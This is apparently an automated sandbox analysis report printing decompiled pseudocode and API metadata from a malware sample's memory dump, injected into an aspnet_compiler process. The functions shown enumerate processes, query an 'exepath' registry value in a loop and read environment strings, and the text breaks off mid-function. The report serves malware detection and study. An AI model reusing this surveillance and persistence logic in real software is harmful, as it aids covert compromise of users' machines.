					_t42 = E0043A9B5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E00444A38(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E0043A9B5(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E00445002(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E00445002();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00447BE5(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E00447A10(_t77, _t89, _t100, __eflags);
						}
					}
					E00445002(_t100);
					__eflags = _v12 ^ _t106;
					return E004338BB(_v12 ^ _t106);
				} else {
					_t54 = E00447655( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E00447681( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E00445002( *0x470750);
							 *0x470750 = 0;
							 *_t107 = 0x470760;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x470760 * 0x3c;
								_t87 =  *0x4707b4; // 0x0
								_push(__edi);
								 *0x470758 = 1;
								_v8 = _t85;
								_t116 =  *0x4707a6; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x4707fa; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x470808; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E00444607(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x470764, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x4707b8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00447649()) = _v8;
							 *(E0044763D()) = _v12;
							_t61 = E00447643();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}


































                    0x00447be5
                    0x00447bf4
                    0x00447bfb
                    0x00447bff
                    0x00447c02
                    0x00447c05
                    0x00447c0a
                    0x00447c0d
                    0x00447d35
                    0x00447d35
                    0x00447d36
                    0x00447d37
                    0x00447d38
                    0x00447d39
                    0x00447d3a
                    0x00447d3f
                    0x00447d43
                    0x00447d4b
                    0x00447d52
                    0x00447d55
                    0x00447d62
                    0x00447d69
                    0x00447d6a
                    0x00447d6c
                    0x00447d71
                    0x00447d80
                    0x00447d87
                    0x00447d8f
                    0x00447d91
                    0x00447d9b
                    0x00447d9e
                    0x00447dab
                    0x00447dae
                    0x00447db0
                    0x00447dc9
                    0x00447dd1
                    0x00447dd3
                    0x00447dd9
                    0x00447dde
                    0x00447dd5
                    0x00447dd5
                    0x00000000
                    0x00447dd5
                    0x00447db2
                    0x00447db2
                    0x00447db3
                    0x00447db3
                    0x00447db3
                    0x00447de0
                    0x00447d93
                    0x00447d93
                    0x00447d93
                    0x00447ded
                    0x00447def
                    0x00447df1
                    0x00447df3
                    0x00447e03
                    0x00447e03
                    0x00447df5
                    0x00447df5
                    0x00447df8
                    0x00000000
                    0x00447dfa
                    0x00447dfa
                    0x00447dfb
                    0x00447e00
                    0x00447df8
                    0x00447e09
                    0x00447e14
                    0x00447e1f
                    0x00447c13
                    0x00447c17
                    0x00447c1c
                    0x00447c1f
                    0x00000000
                    0x00447c25
                    0x00447c29
                    0x00447c2e
                    0x00447c31
                    0x00000000
                    0x00447c37
                    0x00447c3d
                    0x00447c42
                    0x00447c48
                    0x00447c58
                    0x00447c5e
                    0x00447c65
                    0x00447c6b
                    0x00447c6f
                    0x00447c75
                    0x00447c78
                    0x00447c7f
                    0x00447c86
                    0x00447c86
                    0x00447c89
                    0x00447c90
                    0x00447ca8
                    0x00447ca8
                    0x00447cab
                    0x00447c92
                    0x00447c92
                    0x00447c99
                    0x00000000
                    0x00447c9b
                    0x00447c9d
                    0x00447ca3
                    0x00447ca3
                    0x00447c99
                    0x00447cb3
                    0x00447ccf
                    0x00447cdf
                    0x00447cd6
                    0x00447cd8
                    0x00447cd8
                    0x00447cfd
                    0x00447d0f
                    0x00447d04
                    0x00447d07
                    0x00447d07
                    0x00447cfd
                    0x00447d19
                    0x00447d23
                    0x00447d28
                    0x00447d2d
                    0x00447d34
                    0x00447d34
                    0x00447c31
                    0x00447c1f

                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                    • _free.LIBCMT ref: 00447C3D
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 00447E09
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    • Opcode ID: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                    • Instruction ID: b174790296e1c1cb64190fb610b95ef3deb4325f3671f118df16a2f4d1cf92b6
                    • Opcode Fuzzy Hash: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                    • Instruction Fuzzy Hash: 97511871D04209EBEB14EF79DC819AA77B8EF40324F11026FE455E3291E7389D428B9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040EE40 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E0040EE40(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v540;
				char _v568;
				void* _v572;
				void* _v584;
				char _v604;
				void* _v608;
				char _v628;
				void* _v632;
				char _v652;
				void* _v656;
				char _v676;
				void* _v680;
				char _v700;
				void* _v704;
				char _v724;
				void* _v728;
				char _v748;
				void* _v752;
				char _v772;
				void* _v776;
				char _v796;
				void* _v800;
				char _v820;
				void* _v824;
				char _v844;
				void* _v848;
				char _v868;
				void* _v872;
				char _v892;
				void* _v896;
				char _v912;
				char _v916;
				void* _v920;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t45;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t133;
				void* _t134;

				_t120 = __edx;
				_t81 = __ecx;
				_t80 = __ebx;
				_t133 = __ecx;
				E004020BF(__ebx, __ecx);
				 *0x472ae4 = E0041AB12(_t81);
				_t134 = CreateToolhelp32Snapshot(2, 0);
				if(_t134 != 0) {
					_v568 = 0x22c;
					_push( &_v568);
					Process32FirstW(_t134);
					_t45 = Process32NextW(_t134,  &_v572);
					_t138 = _t45;
					if(_t45 != 0) {
						do {
							E0040415E(__ebx,  &_v912, _t120, 0x465488,  &_v540);
							_t50 = E0041A6E9(_t80,  &_v604, E0041AB40(_v572) & 0x000000ff);
							_t51 = E0041A6E9(_t80,  &_v628, _v572);
							_t53 = E0041A879(_t80,  &_v676, E0041AB76( &_v652, _v572));
							_t120 = E00402E81( &_v868, E00408832(_t80,  &_v844, E00402E81( &_v820, E00408832(_t80,  &_v796, E00402E81( &_v772, E00408832(_t80,  &_v748, E004087CF(_t80,  &_v724, _t133, 0x465488, _t138, E0041A879(_t80,  &_v700,  &_v916)), _t133, 0x465488, _t138, 0x465488), _t53), _t133, 0x465488, _t138, 0x465488), _t51), _t133, 0x465488, _t138, 0x465488), _t50);
							E00401FC2(_t133, _t61, _t134, E00408832(_t80,  &_v892, _t61, _t133, 0x465488, _t138, "|"));
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00401FB8();
							E00401FB8();
							E00401EE9();
						} while (Process32NextW(_t134,  &_v584) != 0);
					}
					CloseHandle(_t134);
				}
				return _t133;
			}













































                    0x0040ee40
                    0x0040ee40
                    0x0040ee40
                    0x0040ee49
                    0x0040ee4b
                    0x0040ee59
                    0x0040ee64
                    0x0040ee68
                    0x0040ee75
                    0x0040ee80
                    0x0040ee82
                    0x0040ee91
                    0x0040ee97
                    0x0040ee99
                    0x0040eea4
                    0x0040eeb0
                    0x0040eed0
                    0x0040eee5
                    0x0040ef08
                    0x0040ef83
                    0x0040ef92
                    0x0040ef9b
                    0x0040efa4
                    0x0040efad
                    0x0040efb6
                    0x0040efc2
                    0x0040efce
                    0x0040efda
                    0x0040efe6
                    0x0040eff2
                    0x0040effe
                    0x0040f00a
                    0x0040f016
                    0x0040f022
                    0x0040f02b
                    0x0040f03f
                    0x0040eea4
                    0x0040f048
                    0x0040f048
                    0x0040f059

                    APIs
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE5E
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040EE82
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EE91
                    • CloseHandle.KERNEL32(00000000), ref: 0040F048
                      • Part of subcall function 0041AB40: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040EB16,00000000,?,?,00473280), ref: 0041AB55
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F039
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
                    • API String ID: 1735047541-0
                    • Opcode ID: 83793ca1565dacf0b6b2b1276a802b59890683215be18fc75706178601a3eb30
                    • Instruction ID: fc5c85540f889f3a2ab1a6016a9079e2269e38591cc5ac43cbc88825ef87a1e7
                    • Opcode Fuzzy Hash: 83793ca1565dacf0b6b2b1276a802b59890683215be18fc75706178601a3eb30
                    • Instruction Fuzzy Hash: CD4142311082415BC324F761DC91AEFB3E9AFD4344F50493EF48A921E2EF38A94AC65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00442719 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E00442719(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46f00c; // 0x54ba778e
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E004425DA( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00432C79(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00432C79(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00432C79(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0044E355(_t56);
						_t40 = E00445002(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0044E355(_t56);
						E00445002(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46f00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                    0x00442719
                    0x00442723
                    0x00442727
                    0x00442729
                    0x0044272d
                    0x00442737
                    0x00442748
                    0x0044274d
                    0x0044274f
                    0x00442751
                    0x00442753
                    0x00442755
                    0x00442759
                    0x00442813
                    0x00442821
                    0x00442823
                    0x00442828
                    0x0044282f
                    0x00442831
                    0x0044283f
                    0x0044284e
                    0x00442851
                    0x00442853
                    0x00000000
                    0x00442854
                    0x00442761
                    0x00442766
                    0x0044276b
                    0x0044276d
                    0x0044276d
                    0x0044276f
                    0x00442774
                    0x00442778
                    0x00442778
                    0x0044277b
                    0x0044279a
                    0x0044279a
                    0x0044279c
                    0x0044279f
                    0x004427a8
                    0x004427ab
                    0x004427b0
                    0x004427b3
                    0x004427b8
                    0x00000000
                    0x00000000
                    0x004427ba
                    0x00000000
                    0x0044277d
                    0x0044277d
                    0x0044277f
                    0x00442788
                    0x0044278b
                    0x00442790
                    0x00442793
                    0x00442798
                    0x004427c2
                    0x004427c5
                    0x004427c7
                    0x004427ca
                    0x004427d2
                    0x004427d8
                    0x004427df
                    0x004427e1
                    0x004427e9
                    0x004427f8
                    0x004427fc
                    0x004427fe
                    0x00442801
                    0x00000000
                    0x00000000
                    0x00442803
                    0x00442806
                    0x00442808
                    0x00442808
                    0x00442809
                    0x0044280b
                    0x0044280e
                    0x00000000
                    0x00442808
                    0x00000000
                    0x00442798
                    0x0044277b
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                    • Instruction ID: 2285a7be470c23e98719e3e167ac4dd42b0d3d2551702f58938e7795a41d704d
                    • Opcode Fuzzy Hash: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                    • Instruction Fuzzy Hash: E941F332E002009FEB10DF79C981A5EB3B5EF89714F5581AEE915EB381DBB5AD01CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044F9AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E0044F9AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46f00c; // 0x54ba778e
				_v8 = _t34 ^ _t70;
				E004390B7(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E004338BB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00435760(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00434713(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00444A38(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00455A90();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                    0x0044f9b4
                    0x0044f9bb
                    0x0044f9c7
                    0x0044f9cc
                    0x0044f9d1
                    0x0044f9d6
                    0x0044f9d9
                    0x0044f9db
                    0x0044f9db
                    0x0044f9e0
                    0x0044f9f9
                    0x0044f9ff
                    0x0044fa04
                    0x0044faa3
                    0x0044faa7
                    0x0044faac
                    0x0044faac
                    0x0044fac8
                    0x0044fac8
                    0x0044fa0a
                    0x0044fa12
                    0x0044fa16
                    0x0044fa62
                    0x0044fa64
                    0x0044fa66
                    0x0044fa6b
                    0x0044fa82
                    0x0044fa8a
                    0x0044fa9a
                    0x0044fa9a
                    0x0044fa8a
                    0x0044fa9c
                    0x0044fa9d
                    0x00000000
                    0x0044faa2
                    0x0044fa1d
                    0x0044fa1f
                    0x0044fa21
                    0x0044fa29
                    0x0044fa46
                    0x0044fa50
                    0x0044fa55
                    0x00000000
                    0x00000000
                    0x0044fa57
                    0x0044fa5d
                    0x0044fa5d
                    0x00000000
                    0x0044fa5d
                    0x0044fa2d
                    0x0044fa31
                    0x0044fa36
                    0x0044fa3a
                    0x00000000
                    0x00000000
                    0x0044fa3c
                    0x00000000

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C), ref: 0044F9F9
                    • __alloca_probe_16.LIBCMT ref: 0044FA31
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?), ref: 0044FA82
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?,00000002,00000000), ref: 0044FA94
                    • __freea.LIBCMT ref: 0044FA9D
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    • Opcode ID: e30088a7f1d1453c4e6029d37d92c7a58ce3ccc3468233c635f768e2873a9a9e
                    • Instruction ID: c39bf728e7cf4935227f6dd7d506cca849d0501c7d5e8428f05d5abeab6cc89e
                    • Opcode Fuzzy Hash: e30088a7f1d1453c4e6029d37d92c7a58ce3ccc3468233c635f768e2873a9a9e
                    • Instruction Fuzzy Hash: 2631E372A0020AABEF249F65DC41DAF7BA5EB40314F04057AFC08E7251E739DD59CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411C1E Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 93sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00411C1E(void* __eflags) {
				char _v524;
				void* __ebx;
				void* __edi;
				void* _t6;
				void* _t7;
				void* _t8;
				signed int _t9;
				void* _t11;
				char _t16;
				void* _t19;
				void* _t20;
				void* _t23;
				void* _t31;
				signed int _t55;
				void* _t57;

				_t57 = (_t55 & 0xfffffff8) - 0x208;
				_t31 = 0x473220;
				_t6 = E00406E3A(0x46a8f0);
				_t53 = "exepath";
				if(_t6 == 0) {
					goto L8;
				} else {
					E00435760(0x46a8f0,  &_v524, 0, 0x208);
					_t19 = E0040245C();
					_t20 = E00401F8B(0x473280);
					_t44 = E00401F8B(0x473238);
					_t23 = E004129E0(_t22, "exepath",  &_v524, 0x410, _t20, _t19);
					_t57 = _t57 + 0x20;
					if(_t23 != 0) {
						L004086CB(0x473280, 0x473220, _t44,  &_v524);
					}
					_t31 = 0x473220;
					if(E00406E3A(0x46a8f0) == 0) {
						while(1) {
							L8:
							__eflags =  *0x470d60;
							if( *0x470d60 == 0) {
								break;
							}
							Sleep(0xbb8);
							__eflags =  *0x470b32;
							if( *0x470b32 != 0) {
								_push(E00401EE4(0x473208));
								E0040C21B(0x473208);
								_pop(_t31);
							}
							_push(_t31);
							_t7 = E0040245C();
							_t8 = E00401F8B(0x473280);
							_t9 = E0040245C();
							_t11 = E00401EE4(0x473220);
							_t31 = 0x473238;
							E00412C2F(E00401F8B(0x473238), __eflags, _t53, _t11, 2 + _t9 * 2, _t8, _t7);
							_t57 = _t57 + 0x18;
						}
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = 1;
					}
				}
				return _t16;
			}


















                    0x00411c24
                    0x00411c3a
                    0x00411c3c
                    0x00411c46
                    0x00411c4d
                    0x00000000
                    0x00411c53
                    0x00411c5f
                    0x00411c69
                    0x00411c71
                    0x00411c8c
                    0x00411c8e
                    0x00411c93
                    0x00411c98
                    0x00411ca1
                    0x00411ca1
                    0x00411ca8
                    0x00411cb1
                    0x00411d1c
                    0x00411d1c
                    0x00411d1c
                    0x00411d23
                    0x00000000
                    0x00000000
                    0x00411cbd
                    0x00411cc3
                    0x00411cca
                    0x00411cd6
                    0x00411cd8
                    0x00411cde
                    0x00411cde
                    0x00411cdf
                    0x00411ce2
                    0x00411cea
                    0x00411cf2
                    0x00411d01
                    0x00411d08
                    0x00411d14
                    0x00411d19
                    0x00411d19
                    0x00411d25
                    0x00411d25
                    0x00411cb3
                    0x00411cb5
                    0x00411cb5
                    0x00411cb1
                    0x00411d2e

                    APIs
                      • Part of subcall function 004129E0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                      • Part of subcall function 004129E0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                      • Part of subcall function 004129E0: RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    • Sleep.KERNEL32(00000BB8), ref: 00411CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQuerySleepValue
                    • String ID: 2G$82G$82G$exepath
                    • API String ID: 4119054056-3664068176
                    • Opcode ID: f57c8dd622f87a1154279fcf81cc6f9dccd49157269dcb42feaca89e4549597b
                    • Instruction ID: 1bc3c23f432ba4f57a41c102a15aec319e0c21ae64d144f38269a80ff3ae14c8
                    • Opcode Fuzzy Hash: f57c8dd622f87a1154279fcf81cc6f9dccd49157269dcb42feaca89e4549597b
                    • Instruction Fuzzy Hash: 5021F4A0B0030427D600B76A6C46ABF228E8B80308F00497FB946E72D3EF3C9D4641AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044DBDA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0044DBDA() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0044DBA3(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00444A38(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00445002(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                    0x0044dbe9
                    0x0044dbef
                    0x0044dc47
                    0x0044dc47
                    0x0044dbf1
                    0x0044dbf2
                    0x0044dbf7
                    0x0044dc00
                    0x0044dc06
                    0x0044dc0c
                    0x0044dc11
                    0x00000000
                    0x0044dc13
                    0x0044dc19
                    0x0044dc1e
                    0x0044dc3c
                    0x0044dc36
                    0x0044dc36
                    0x0044dc38
                    0x0044dc38
                    0x0044dc3f
                    0x0044dc44
                    0x0044dc11
                    0x0044dc4b
                    0x0044dc4e
                    0x0044dc4e
                    0x0044dc5c

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044DBE3
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044DC06
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044DC2C
                    • _free.LIBCMT ref: 0044DC3F
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DC4E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 05963b722a187b08b23702ed25f32100ad8df03e6f93360e21280f476eebae31
                    • Instruction ID: d30a67c417177e80d80b31b0a31e6726aa7580f18a7a9fd153e391297dd7151b
                    • Opcode Fuzzy Hash: 05963b722a187b08b23702ed25f32100ad8df03e6f93360e21280f476eebae31
                    • Instruction Fuzzy Hash: 38017172A057157F37211AA66D89C7F7A6DDAC2B65315017EF904D2341DEA88C02C1B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041AD6A Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041AD6A(long __edx, WCHAR* _a4, long _a8) {
				long _v4;
				long _t8;
				long _t9;
				struct _OVERLAPPED* _t19;
				void* _t20;
				long _t21;
				long _t23;
				void* _t24;
				void* _t25;

				_t19 = 0;
				_t25 = _t20;
				_t23 = __edx;
				_t8 = _a8;
				if(_t8 == 0) {
					_t9 = 0x40000000;
					_t21 = 2;
				} else {
					if(_t8 != 1) {
						_t9 = _a8;
						_t21 = _a8;
					} else {
						_t9 = 4;
						_t21 = _t9;
					}
				}
